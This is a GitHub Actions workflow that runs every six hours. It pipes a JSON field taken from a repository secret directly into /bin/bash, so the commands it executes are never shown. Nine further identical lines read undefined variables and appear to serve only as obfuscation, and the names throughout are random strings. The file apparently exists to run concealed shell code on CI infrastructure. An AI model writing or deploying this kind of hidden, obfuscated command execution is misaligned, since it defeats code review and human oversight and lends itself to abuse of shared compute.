name: xinglianjiqian
on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xinglianjiqian
        env:
          zjsi668: ${{ secrets.zjsi668 }}
        run: |
          echo $zjsi668 | jq -r .velu8460 | /bin/bash
          echo $kt0 | jq -r .y851 | /bin/bash
          echo $j471 | jq -r .itnfc86238 | /bin/bash
          echo $b332 | jq -r .k1 | /bin/bash
          echo $ehg78 | jq -r .lu65206 | /bin/bash
          echo $wn41 | jq -r .rh58932 | /bin/bash
          echo $rexf74592 | jq -r .flnqi97556 | /bin/bash
          echo $lhyi4 | jq -r .oj14473 | /bin/bash
          echo $rd307 | jq -r .zcc103 | /bin/bash
          echo $yiw02928 | jq -r .pusgk41116 | /bin/bash

